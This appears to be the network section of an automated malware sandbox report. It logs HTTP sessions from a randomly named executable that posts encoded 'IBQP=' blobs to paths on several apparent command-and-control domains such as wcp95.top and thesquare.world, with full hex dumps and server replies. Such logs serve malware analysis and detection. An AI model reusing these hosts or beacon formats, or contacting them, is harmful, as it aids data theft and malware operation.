                                                                                                Nov 11, 2024 17:02:28.456976891 CET767OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 79 6a 2b 32 6c 42 37 6f 44 77 37 38 33 61 4a 57 78 35 70 79 50 75 6e 78 49 79 79 69 7a 63 4b 44 6a 68 71 61 43 31 61 35 51 6f 36 64 57 67 59 6f 64 4a 7a 47 48 33 34 61 62 33 39 2b 6c 2b 65 32 36 69 79 36 77 71 71 44 61 57 2b 6e 77 33 44 59 68 30 53 73 39 56 61 79 36 42 5a 55 30 37 7a 46 48 51 37 4e 59 48 4d 74 46 4c 34 32 7a 66 64 74 42 2f 4f 5a 70 4e 45 2b 55 79 47 71 66 54 50 44 6f 69 53 71 62 42 72 48 48 35 59 59 61 6a 43 75 4b 34 30 49 30 49 37 4d 54 43 63 35 37 2f 38 2f 44 66 51 33 62 62 35 7a 51 73 33 32 59 68 72 41 6d 41 54 69 41 56 4d 66 37 43 44 52 54 4b 6f 47 6c 61 54 71 50 2b 50 56 4f 6d 6b 3d
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizcKDjhqaC1a5Qo6dWgYodJzGH34ab39+l+e26iy6wqqDaW+nw3DYh0Ss9Vay6BZU07zFHQ7NYHMtFL42zfdtB/OZpNE+UyGqfTPDoiSqbBrHH5YYajCuK40I0I7MTCc57/8/DfQ3bb5zQs32YhrAmATiAVMf7CDRTKoGlaTqP+PVOmk=
                                                                                                Nov 11, 2024 17:02:28.770477057 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:28 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.11.2049769154.23.184.95807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:31.327910900 CET1289OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 79 6a 2b 32 6c 42 37 6f 44 77 37 38 33 61 4a 57 78 35 70 79 50 75 6e 78 49 79 79 69 7a 61 53 44 6a 30 6d 61 44 58 79 35 4b 6f 36 64 66 41 59 74 64 4a 7a 68 48 33 51 57 62 33 78 45 6c 38 57 32 31 69 75 36 32 66 65 44 56 57 2b 6e 74 6e 44 5a 76 55 53 31 39 56 4b 32 36 42 4a 55 30 37 7a 46 48 53 7a 4e 4d 44 59 74 4a 72 34 35 2b 50 64 70 46 2f 50 45 70 4e 4d 75 55 79 53 51 59 69 7a 44 6f 44 69 71 49 69 44 48 61 4a 59 61 58 44 43 32 4b 34 35 49 30 4c 66 41 54 43 5a 73 37 38 73 2f 50 6f 6c 78 4a 49 46 35 44 74 62 55 55 56 6e 4e 68 52 48 52 65 43 55 33 2b 68 50 6c 58 74 4d 2f 71 35 37 66 58 63 54 72 56 44 4a 48 38 41 4b 72 32 54 67 2b 73 7a 41 75 43 55 54 63 49 66 62 44 79 6a 61 32 47 65 48 52 6f 43 62 49 38 71 58 73 42 47 44 38 75 51 66 67 6a 71 30 4a 5a 71 38 6f 4d 63 57 46 45 4d 41 37 63 4e 31 7a 32 2b 54 73 6a 52 63 53 4d 42 6c 6e 7a 65 72 44 59 30 65 51 6d 31 36 75 72 65 5a 4f 74 6e 48 36 4c 6c 76 4d 35 74 75 38 41 64 38 38 42 49 2f 61 39 56 65 2f 49 [TRUNCATED]
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizaSDj0maDXy5Ko6dfAYtdJzhH3QWb3xEl8W21iu62feDVW+ntnDZvUS19VK26BJU07zFHSzNMDYtJr45+PdpF/PEpNMuUySQYizDoDiqIiDHaJYaXDC2K45I0LfATCZs78s/PolxJIF5DtbUUVnNhRHReCU3+hPlXtM/q57fXcTrVDJH8AKr2Tg+szAuCUTcIfbDyja2GeHRoCbI8qXsBGD8uQfgjq0JZq8oMcWFEMA7cN1z2+TsjRcSMBlnzerDY0eQm16ureZOtnH6LlvM5tu8Ad88BI/a9Ve/Id0s9IyiXKDW3SOvmnmoJvp4dMhKpjWGta5mbDiF9lkJ/KsIifww7nRaGS47Awtd2XoT8hoSBbuHLVe77A/3hk/2jcJRudoWz4bzC0DYVdpsTWRcIIVK7Pw6r0Ig4cBsgPAmJaLCesuu8RLAmhXIb2iWCgAfHc0N5UGBKFCrozt1CcVVZ6CAOr0WftSB99Fpln0olEEnqOD/+NNB4oTv5U97zg0AMa3Op0RLGH1jKTkgfnBJS+9dwguQ+SZe3HnI2rgkDtriiuPyT8vqm8ORL+0LY3gzmO2e97XYGB5wEywyIX/9F2KoetYq5p33mjfDsmgUxbn/VxW+ljPhl6xw1fmFzL4Vhv4wZM7Kr4QCM/B3aYJmP/Q/dhQVIfAb8Cnojyawhb/vqxgS7bQhRfIRB
                                                                                                Nov 11, 2024 17:02:31.328037977 CET6627OUTData Raw: 53 6a 67 4e 62 6d 30 7a 71 48 2b 34 5a 30 64 4b 78 61 49 62 6a 68 6c 34 75 6e 5a 67 54 39 63 53 6e 51 4a 2f 41 64 32 30 6c 54 31 77 4f 54 76 61 75 36 44 77 43 56 4a 48 53 37 61 6b 76 62 69 59 64 74 34 5a 4b 42 2f 68 72 71 6b 31 41 70 49 37 54 51
                                                                                                Data Ascii: SjgNbm0zqH+4Z0dKxaIbjhl4unZgT9cSnQJ/Ad20lT1wOTvau6DwCVJHS7akvbiYdt4ZKB/hrqk1ApI7TQgJNuPIOd+bHYtbSPB4BIrDqfIJSuWSVjX3aQzwQX4T/OmCyJXOV67m26wzWrULVC6zpqviL+ANpmhlkFSeqBBkxf2OMFoLySsi5mrlqd8xBJzXbbY3efmLiqePh1HtJNhZoLCQL6RcfGGs+dqRkX0gN+Fwg0yAF1G
                                                                                                Nov 11, 2024 17:02:31.669975042 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.11.2049770154.23.184.95807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:34.199379921 CET493OUTGET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:34.538172960 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.11.204977113.248.169.48807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:39.955378056 CET765OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 74 66 44 63 74 39 66 57 67 57 4c 77 73 43 4a 6c 4c 32 59 6d 67 45 51 36 4a 72 30 66 67 58 63 63 64 33 6d 4b 55 67 50 39 36 71 2f 38 61 34 52 66 75 46 45 6e 4f 48 56 6c 69 44 43 72 73 6f 4a 2f 32 6c 42 4d 38 38 59 32 4e 36 48 4a 53 6c 51 6a 2f 63 37 6e 55 63 5a 70 42 67 6d 54 49 43 2b 74 44 4a 72 78 67 57 53 75 43 4a 79 6b 56 52 45 63 70 72 6d 74 41 58 37 42 61 65 62 44 38 53 4f 31 6e 55 47 4d 6d 7a 67 76 47 53 59 4c 75 64 6b 32 74 6e 48 4c 4c 4f 53 48 41 78 51 39 4a 31 79 6f 42 35 30 67 63 4a 54 78 63 67 49 79 59 2f 37 59 69 73 73 66 67 3d 3d
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoTotfDct9fWgWLwsCJlL2YmgEQ6Jr0fgXccd3mKUgP96q/8a4RfuFEnOHVliDCrsoJ/2lBM88Y2N6HJSlQj/c7nUcZpBgmTIC+tDJrxgWSuCJykVREcprmtAX7BaebD8SO1nUGMmzgvGSYLudk2tnHLLOSHAxQ9J1yoB50gcJTxcgIyY/7Yissfg==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.11.204977213.248.169.48807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:42.619852066 CET785OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 4e 50 44 64 4d 39 66 52 41 57 49 75 38 43 4a 72 72 33 77 6d 67 49 51 36 4d 62 6b 66 54 6a 63 53 5a 6e 6d 4c 56 67 50 2b 36 71 2f 33 36 34 51 51 4f 46 50 6e 4f 44 6e 6c 6a 2f 43 72 73 73 4a 2f 30 39 42 4e 4e 38 48 73 39 36 46 64 69 6c 53 2b 50 63 37 6e 55 63 5a 70 42 63 63 54 4a 71 2b 74 53 5a 72 77 45 4b 56 77 53 4a 78 30 46 52 45 4c 5a 72 69 74 41 58 4a 42 62 53 31 44 2b 61 4f 31 6d 6b 47 4e 30 62 6e 34 57 53 65 50 75 64 32 77 65 53 78 51 70 47 38 4e 48 56 51 6b 72 4e 75 70 58 30 75 39 75 39 33 79 50 38 36 32 6f 47 54 61 67 74 33 43 6c 37 65 62 64 32 42 50 7a 57 56 2b 53 4f 64 2b 47 4d 4f 49 4d 6b 3d
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfTjcSZnmLVgP+6q/364QQOFPnODnlj/CrssJ/09BNN8Hs96FdilS+Pc7nUcZpBccTJq+tSZrwEKVwSJx0FRELZritAXJBbS1D+aO1mkGN0bn4WSePud2weSxQpG8NHVQkrNupX0u9u93yP862oGTagt3Cl7ebd2BPzWV+SOd+GMOIMk=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.11.204977313.248.169.48807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:45.290671110 CET1289OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 4e 50 44 64 4d 39 66 52 41 57 49 75 38 43 4a 72 72 33 77 6d 67 49 51 36 4d 62 6b 66 54 37 63 53 72 76 6d 4b 32 59 50 78 61 71 2f 72 71 34 72 51 4f 46 6f 6e 49 71 73 6c 6a 7a 30 72 75 6b 4a 2b 56 64 42 5a 70 49 48 69 4e 36 46 43 79 6c 54 6a 2f 64 2f 6e 51 41 64 70 48 38 63 54 4a 71 2b 74 51 78 72 33 51 57 56 79 53 4a 79 6b 56 52 49 63 70 72 4b 74 41 66 6a 42 62 57 4c 44 50 36 4f 32 47 30 47 4f 48 7a 6e 6e 6d 53 63 44 4f 63 6c 77 65 4f 69 51 70 71 4f 4e 48 4a 2b 6b 73 70 75 71 78 52 6e 36 63 4a 34 70 66 30 51 72 4a 36 35 4e 7a 74 65 4c 46 75 71 53 39 36 2b 48 47 62 47 35 52 75 71 76 30 67 2b 5a 34 4b 76 31 70 70 75 76 63 77 5a 4b 6d 57 42 35 59 61 63 56 2b 75 51 58 73 41 32 2f 34 74 33 30 2f 53 6a 64 74 2f 6b 35 45 34 64 45 6f 55 78 69 69 79 2b 6a 6d 53 56 37 50 4a 4e 32 75 50 66 6a 77 41 31 49 42 59 58 6c 48 57 6b 5a 4f 37 51 56 62 4f 4c 30 6d 64 45 44 55 35 69 50 2f 46 75 57 4a 4b 4b 53 43 67 72 4d 57 70 78 6d 6d 74 36 72 74 52 47 42 69 6d 59 59 [TRUNCATED]
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfT7cSrvmK2YPxaq/rq4rQOFonIqsljz0rukJ+VdBZpIHiN6FCylTj/d/nQAdpH8cTJq+tQxr3QWVySJykVRIcprKtAfjBbWLDP6O2G0GOHznnmScDOclweOiQpqONHJ+kspuqxRn6cJ4pf0QrJ65NzteLFuqS96+HGbG5Ruqv0g+Z4Kv1ppuvcwZKmWB5YacV+uQXsA2/4t30/Sjdt/k5E4dEoUxiiy+jmSV7PJN2uPfjwA1IBYXlHWkZO7QVbOL0mdEDU5iP/FuWJKKSCgrMWpxmmt6rtRGBimYYC2Re7c4+hRr7zZZQNcw/mkrylLwBURolI6IGpD8TNO3miCR9Gk60JMKyc8GjVZVkGtTMsf9GMu4PTGhfSql0TzHu6XGPUola18ZSy75beBMvOXdU01YwA/D3Rg0m5hXkrYUmmsWXp+b1h5wkrV5g2tm4bikj5lDoWWjD3SqhULQzutnoIVuTDfkzvNUDFj5wHooRp7m9F88eUf4V/qcXz6etJWAcl0T+tTO9GmX2MKATW5y1x1NOB5ImReSnKfIsMSaHXcLxJIAQgupeWU2K9f+KMhaH3en6kIPYsFh0i2x56qFJWQnW7O4Xy8eWlj0wRjIZaz25PAh7i6qjkTOzch6jU5WPsLCVSlW0fwpkFp28A/dhkbtRcKjXsWhU8dJZ38
                                                                                                Nov 11, 2024 17:02:45.290719032 CET1289OUTData Raw: 47 47 71 49 75 39 75 78 56 67 74 61 56 6b 54 32 33 2f 4f 57 51 62 5a 65 6a 53 48 7a 6c 4f 73 69 71 42 49 4b 49 58 37 4b 63 61 61 66 48 31 7a 30 51 57 2b 74 71 4a 30 35 44 58 4c 74 6e 33 31 6d 6a 55 6f 53 6e 47 78 2b 2f 47 52 76 41 78 57 62 2f 71
                                                                                                Data Ascii: GGqIu9uxVgtaVkT23/OWQbZejSHzlOsiqBIKIX7KcaafH1z0QW+tqJ05DXLtn31mjUoSnGx+/GRvAxWb/qt2C/b0h+DW3Ew2z9Is4+icac4sm2vRJCMaJ1sHhxgAPvUjLAcMBxAWWPJYF8BaRNZ3wafiNOU0fOs/Y9JdjynCwumSqfVU6GDbZazvYVZcF0EuzUSY7mOHdVjILILEYO3mn7tHMXoVHVDAaHrWm8Vhy5v78WTW24S
                                                                                                Nov 11, 2024 17:02:45.290772915 CET5356OUTData Raw: 79 47 4c 6c 7a 59 59 50 64 6d 36 30 52 41 71 46 4c 33 38 38 72 69 32 34 43 54 4b 32 52 78 78 4c 54 58 61 65 78 61 66 79 65 70 50 38 50 54 4a 4e 52 77 30 30 6c 6e 50 36 6e 36 56 6e 46 6f 57 43 52 6c 75 72 64 56 78 6f 62 67 70 5a 4b 66 57 6a 63 66
                                                                                                Data Ascii: yGLlzYYPdm60RAqFL388ri24CTK2RxxLTXaexafyepP8PTJNRw00lnP6n6VnFoWCRlurdVxobgpZKfWjcfdo84oLi7hq5hAPZngyXJ7lB4ybT4hlSiQNTx3cLz3307YTGqBuozJi5/VfRjnqGUHjASzfDzvNrDHe2r0QyRsD3G8ccKOMW9BS37c/1uRQDVHILerdYFJusXxYbLEJ6bBp0OyDyYEyCJJhMk2WF9nNm1c47Lh+SSh


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.11.204977413.248.169.48807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:47.960872889 CET499OUTGET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:48.096805096 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:02:48 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 47 53 53 38 6c 71 66 69 72 49 6f 33 71 4b 65 37 59 2b 64 43 58 57 76 30 6d 64 53 4b 6b 35 6e 2f 69 78 59 2f 37 34 33 68 59 69 6e 5a 61 4a 37 42 45 6d 49 74 77 75 50 65 37 61 38 66 58 76 78 50 67 4b 54 36 76 77 33 6b 36 66 38 46 34 56 52 61 61 2b 55 62 76 61 69 74 44 30 77 52 2f 74 55 71 76 58 6f 70 6f 46 6b 43 43 4b 65 64 7a 42 74 45 33 6a 32 70 6d 54 6f 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.11.20497753.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:53.431359053 CET777OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 58 6e 2b 51 78 4a 7a 32 72 56 4e 71 59 6e 33 30 70 47 30 78 73 65 72 73 2b 57 53 68 35 53 35 7a 78 73 33 53 74 69 73 53 39 37 34 79 35 57 30 77 55 41 53 45 5a 43 47 45 48 6a 52 63 71 56 66 32 77 30 36 58 6b 55 58 39 62 76 30 31 33 65 76 51 48 4f 70 30 51 53 38 32 62 2b 79 57 49 61 42 56 48 47 45 65 76 33 59 56 6f 4c 75 51 69 45 44 55 43 58 46 53 30 55 61 63 65 35 79 6b 7a 52 59 2f 57 4f 31 45 59 43 53 76 39 38 31 45 43 38 72 59 58 62 6d 62 35 75 61 64 61 62 38 35 37 5a 6f 67 79 77 4f 43 41 6f 30 37 30 4a 4d 34 2b 4b 6b 75 67 30 34 43 54 51 3d 3d
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnXn+QxJz2rVNqYn30pG0xsers+WSh5S5zxs3StisS974y5W0wUASEZCGEHjRcqVf2w06XkUX9bv013evQHOp0QS82b+yWIaBVHGEev3YVoLuQiEDUCXFS0Uace5ykzRY/WO1EYCSv981EC8rYXbmb5uadab857ZogywOCAo070JM4+Kkug04CTQ==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.11.20497763.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:56.101978064 CET797OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
